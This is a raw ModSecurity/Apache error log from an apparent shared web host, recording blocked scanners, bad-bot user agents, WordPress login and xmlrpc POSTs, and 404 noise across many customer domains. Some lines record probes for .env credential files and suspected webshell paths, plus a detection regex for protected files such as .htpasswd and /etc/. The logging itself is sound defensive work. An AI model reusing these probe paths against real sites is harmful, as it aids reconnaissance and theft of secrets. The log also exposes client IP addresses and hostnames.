[Tue May 26 16:19:04.759820 2026] [security2:error] [pid 782634:tid 782870] [client 45.45.237.225:56658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-gallery-grand.php"] [unique_id "ahV6oP_P9qBfeb1w76ZecwAAAGo"]
[Tue May 26 16:19:04.794572 2026] [security2:error] [pid 782634:tid 782804] [client 45.45.237.225:56594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-gallery-province.php"] [unique_id "ahV6oP_P9qBfeb1w76ZedAAAACg"]
[Tue May 26 16:19:04.799415 2026] [security2:error] [pid 782634:tid 782801] [client 45.45.237.225:56592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/dgssi-downloads-forms.php"] [unique_id "ahV6oP_P9qBfeb1w76ZedQAAACU"]
[Tue May 26 16:19:04.799435 2026] [security2:error] [pid 782634:tid 782845] [client 45.45.237.225:56506] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/dgssi-downloads-circulars.php"] [unique_id "ahV6oP_P9qBfeb1w76ZedgAAAFE"]
[Tue May 26 16:19:04.799515 2026] [security2:error] [pid 782634:tid 782801] [client 45.45.237.225:56592] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dgssi.in"] [uri "/dgssi-downloads-forms.php"] [unique_id "ahV6oP_P9qBfeb1w76ZedQAAACU"]
[Tue May 26 16:19:04.799521 2026] [security2:error] [pid 782634:tid 782845] [client 45.45.237.225:56506] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dgssi.in"] [uri "/dgssi-downloads-circulars.php"] [unique_id "ahV6oP_P9qBfeb1w76ZedgAAAFE"]
[Tue May 26 16:19:04.807881 2026] [security2:error] [pid 782634:tid 782815] [client 45.45.237.225:56580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-downloads-archives.php"] [unique_id "ahV6oP_P9qBfeb1w76ZedwAAADM"]
[Tue May 26 16:19:04.808055 2026] [security2:error] [pid 782634:tid 782819] [client 45.45.237.225:56572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-contact.php"] [unique_id "ahV6oP_P9qBfeb1w76ZeeAAAADc"]
[Tue May 26 16:19:04.808360 2026] [security2:error] [pid 782634:tid 782848] [client 45.45.237.225:56488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-website-terms.php"] [unique_id "ahV6oP_P9qBfeb1w76ZeeQAAAFQ"]
[Tue May 26 16:19:04.823237 2026] [security2:error] [pid 782634:tid 782854] [client 45.45.237.225:56668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-website-disclaimer.php"] [unique_id "ahV6oP_P9qBfeb1w76ZeegAAAFo"]
[Tue May 26 16:19:04.843609 2026] [security2:error] [pid 782634:tid 782773] [client 45.45.237.225:56554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-website-privacy.php"] [unique_id "ahV6oP_P9qBfeb1w76ZeewAAAAk"]
[Tue May 26 16:19:05.889523 2026] [security2:error] [pid 782634:tid 782811] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6of_P9qBfeb1w76ZehwAAAC8"]
[Tue May 26 16:19:06.203312 2026] [security2:error] [pid 782634:tid 782843] [client 105.127.14.241:2939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6of_P9qBfeb1w76ZelwAAAE8"]
[Tue May 26 16:19:07.719227 2026] [security2:error] [pid 782634:tid 782871] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6o__P9qBfeb1w76ZeugAAAGs"]
[Tue May 26 16:19:08.761050 2026] [security2:error] [pid 782634:tid 782862] [client 20.29.64.60:3077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahV6pP_P9qBfeb1w76Ze6wAAAGI"]
[Tue May 26 16:19:09.351062 2026] [security2:error] [pid 782634:tid 782670] [remote 104.168.4.138:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.ndequipments.com"] [uri "/api/.env"] [unique_id "ahV6pf_P9qBfeb1w76ZfAgAALyM"]
[Tue May 26 16:19:09.376441 2026] [security2:error] [pid 782634:tid 782662] [remote 104.168.4.138:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.ndequipments.com"] [uri "/.env"] [unique_id "ahV6pf_P9qBfeb1w76ZfCAAAOxs"]
[Tue May 26 16:19:09.377030 2026] [security2:error] [pid 782634:tid 782690] [remote 104.168.4.138:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.ndequipments.com"] [uri "/backend/.env"] [unique_id "ahV6pf_P9qBfeb1w76ZfBwAAOzc"]
[Tue May 26 16:19:09.731551 2026] [security2:error] [pid 782634:tid 782795] [client 20.151.112.53:39225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahV6pf_P9qBfeb1w76ZfJwAAAB8"]
[Tue May 26 16:19:09.731665 2026] [security2:error] [pid 782634:tid 782795] [client 20.151.112.53:39225] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahV6pf_P9qBfeb1w76ZfJwAAAB8"]
[Tue May 26 16:19:09.948012 2026] [security2:error] [pid 782634:tid 782791] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6pf_P9qBfeb1w76ZfAQAAABs"]
[Tue May 26 16:19:11.743086 2026] [security2:error] [pid 782634:tid 782826] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6p__P9qBfeb1w76ZfTQAAAD4"]
[Tue May 26 16:19:11.875700 2026] [security2:error] [pid 782634:tid 782841] [client 20.29.64.60:3092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahV6p__P9qBfeb1w76ZfYwAAAE0"]
[Tue May 26 16:19:12.890090 2026] [security2:error] [pid 782634:tid 782830] [client 105.127.14.241:2942] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6qP_P9qBfeb1w76ZfegAAAEI"]
[Tue May 26 16:19:13.933410 2026] [security2:error] [pid 782634:tid 782842] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6qf_P9qBfeb1w76ZfiQAAAE4"]
[Tue May 26 16:19:14.952330 2026] [security2:error] [pid 782634:tid 782839] [client 105.127.14.241:2961] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6qv_P9qBfeb1w76ZfqwAAAEs"]
[Tue May 26 16:19:15.793821 2026] [security2:error] [pid 782634:tid 782770] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6q__P9qBfeb1w76ZfuAAAAAY"]
[Tue May 26 16:19:16.548336 2026] [security2:error] [pid 782634:tid 782841] [client 184.154.139.45:32900] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV6rP_P9qBfeb1w76Zf0wAAAE0"]
[Tue May 26 16:19:18.189444 2026] [security2:error] [pid 782634:tid 782820] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV6rv_P9qBfeb1w76Zf8gAAOH0"]
[Tue May 26 16:19:18.812704 2026] [security2:error] [pid 782634:tid 782822] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6rf_P9qBfeb1w76Zf6gAAADo"]
[Tue May 26 16:19:19.816141 2026] [security2:error] [pid 782634:tid 782842] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6rv_P9qBfeb1w76ZgAAAAAE4"]
[Tue May 26 16:19:22.104902 2026] [security2:error] [pid 782634:tid 782781] [client 105.127.14.241:2957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6sv_P9qBfeb1w76ZgPwAAABE"]
[Tue May 26 16:19:22.429828 2026] [security2:error] [pid 782634:tid 782803] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6sf_P9qBfeb1w76ZgNgAAACc"]
[Tue May 26 16:19:23.063123 2026] [autoindex:error] [pid 782634:tid 782787] [client 91.224.92.120:59361] AH01276: Cannot serve directory /home2/aarindhr/public_html/earthone.me/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:19:23.583336 2026] [security2:error] [pid 782634:tid 782847] [client 103.103.33.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6sv_P9qBfeb1w76ZgSQAAAFM"]
[Tue May 26 16:19:25.161578 2026] [security2:error] [pid 782634:tid 782808] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6tP_P9qBfeb1w76ZgdwAAACw"]
[Tue May 26 16:19:25.828200 2026] [security2:error] [pid 782634:tid 782814] [client 185.191.171.5:49730] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahV6tf_P9qBfeb1w76ZgpwAAADI"]
[Tue May 26 16:19:25.828326 2026] [security2:error] [pid 782634:tid 782814] [client 185.191.171.5:49730] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahV6tf_P9qBfeb1w76ZgpwAAADI"]
[Tue May 26 16:19:27.037792 2026] [security2:error] [pid 782634:tid 782782] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6tf_P9qBfeb1w76ZgngAAABI"]
[Tue May 26 16:19:27.383725 2026] [security2:error] [pid 782634:tid 782875] [client 193.37.33.131:38185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV6t__P9qBfeb1w76ZgwQAAAG8"]
[Tue May 26 16:19:28.207142 2026] [security2:error] [pid 782634:tid 782889] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6tv_P9qBfeb1w76ZguAAAAH0"]
[Tue May 26 16:19:30.688223 2026] [security2:error] [pid 782634:tid 782856] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6uf_P9qBfeb1w76Zg8QAAAFw"]
[Tue May 26 16:19:32.486896 2026] [security2:error] [pid 782634:tid 782812] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6u__P9qBfeb1w76ZhDwAAADA"]
[Tue May 26 16:19:34.009656 2026] [security2:error] [pid 782634:tid 782814] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6vf_P9qBfeb1w76ZhNgAAADI"]
[Tue May 26 16:19:36.573497 2026] [security2:error] [pid 782634:tid 782882] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6v__P9qBfeb1w76ZhZQAAAHY"]
[Tue May 26 16:19:36.886889 2026] [security2:error] [pid 782634:tid 782829] [client 167.71.246.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahV6vv_P9qBfeb1w76ZhTAAAQVY"]
[Tue May 26 16:19:38.041399 2026] [security2:error] [pid 782634:tid 782838] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6wf_P9qBfeb1w76ZhggAAAEo"]
[Tue May 26 16:19:40.131480 2026] [security2:error] [pid 782634:tid 782767] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6w__P9qBfeb1w76ZhtQAAAAM"]
[Tue May 26 16:19:41.520574 2026] [security2:error] [pid 782634:tid 782866] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6xf_P9qBfeb1w76Zh1QAAAGY"]
[Tue May 26 16:19:42.194996 2026] [security2:error] [pid 782634:tid 782869] [client 62.60.130.233:60400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV6xv_P9qBfeb1w76Zh6wAAAGk"], referer: https://wordpress.org/
[Tue May 26 16:19:42.549675 2026] [security2:error] [pid 782634:tid 782793] [client 62.60.130.233:57458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV6xv_P9qBfeb1w76Zh9wAAAB0"], referer: https://duckduckgo.com/
[Tue May 26 16:19:42.650695 2026] [security2:error] [pid 782634:tid 782733] [remote 216.185.214.209:40948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahV6xv_P9qBfeb1w76Zh9gAAJ2I"]
[Tue May 26 16:19:42.943364 2026] [security2:error] [pid 782634:tid 782890] [client 114.119.150.168:37045] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV6xv_P9qBfeb1w76ZiAgAAAH4"], referer: http://glorodavionics.com/beta/index.php?route=product/product&manufacturer_id=11&page=6&product_id=167
[Tue May 26 16:19:43.407062 2026] [security2:error] [pid 782634:tid 782858] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6xv_P9qBfeb1w76ZiBQAAAF4"]
[Tue May 26 16:19:45.454074 2026] [security2:error] [pid 782634:tid 782842] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6yf_P9qBfeb1w76ZiMgAAAE4"]
[Tue May 26 16:19:47.805895 2026] [security2:error] [pid 782634:tid 782826] [client 113.184.203.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6y__P9qBfeb1w76ZiZgAAAD4"]
[Tue May 26 16:19:48.201792 2026] [security2:error] [pid 782634:tid 782781] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6y__P9qBfeb1w76ZibAAAABE"]
[Tue May 26 16:19:49.898918 2026] [security2:error] [pid 782634:tid 782867] [client 166.0.151.201:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV6zP_P9qBfeb1w76ZihAAAAGc"]
[Tue May 26 16:19:50.990487 2026] [security2:error] [pid 782634:tid 782829] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6zf_P9qBfeb1w76ZioQAAAEE"]
[Tue May 26 16:19:52.508132 2026] [security2:error] [pid 782634:tid 782882] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV60P_P9qBfeb1w76ZjGgAAdhs"]
[Tue May 26 16:19:52.881848 2026] [security2:error] [pid 782634:tid 782801] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6z__P9qBfeb1w76Zi2AAAACU"]
